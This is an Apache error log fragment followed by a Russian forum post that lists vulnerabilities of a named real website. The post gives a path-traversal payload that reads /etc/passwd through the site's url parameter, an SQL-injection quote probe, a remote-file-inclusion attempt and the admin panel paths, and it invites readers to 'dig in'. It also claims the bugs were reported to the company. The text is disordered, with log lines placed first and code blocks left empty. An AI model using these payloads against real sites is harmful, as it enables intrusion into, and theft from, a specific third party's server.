[Wed Oct 6 00:20:05 2004] [notice] Apache/1.3.31 (Unix) PHP/4.3.8 configured -- resuming normal operations
[Wed Oct 6 00:20:05 2004] [notice] suEXEC mechanism enabled (wrapper: /usr/pkg/sbin/suexec)
[Wed Oct 6 00:20:05 2004] [notice] Accept mutex: flock (Default: flock)
[Wed Oct 6 03:35:44 2004] [error]
[client 66.196.90.83] File does not exist: /www/docs/wwwzhulebino/www/robots.txt
[Wed Oct 6 03:55:59 2004] [error]
[client 66.196.90.210] File does not exist: /www/docs/wwwzhulebino/www/robots.txt PHP Warning:
main(classes/navbar.class.php): failed to open stream: No such file or directory in /
www/docs/wwwzhulebino/www/forum/unauthorized.php on line 46 PHP Fatal error: main():
Failed opening required 'classes/navbar.class.php' (include_path='.:/usr/pkg/lib/php')
in /www/docs/wwwzhulebino/www/forum/unauthorized.php on line 46 [Wed Oct 6 06:35:56 2004]
[error] [client 66.142.198.136] File does not exist: /www/docs/wwwzhulebino/www/robots.txt
Уязвимости www.studioceramica.ru
http://www.studioceramica.ru/site.php?url=news.php&id_menu=4
что наводит на размышления.
url=news.php
что если вместо news.php подставить например ../../../../../../../etc/passwd
опа видим содержимое..
Хорошо подставляем '
и видем: SELECT * FROM menu WHERE lower(href)=lower(''')
Удивительно как же тогда прошел первый запрос, если он что то по базе смотреть, хотя видимо не смотрит.
Дальше пробуем подставить httP://www.hardart.ru/index.php , скрипт если первые символы строки http:// то перебрасывает на refererr.
У сайта есть админ фейс. /admin/
index.php
login.php
есть папочка /admin/admin/
содержимое /var/log/httpd/error_log
Код:
Код:
Вобщем кому интересно копайтесь. (я с себя снимаю всю ответственность)
О всех багах сообщил компании. (adv@tail.ru этот емеил мне сообщили по телефону)
Joker пастух козатых ностр ;)
Ну или вот так: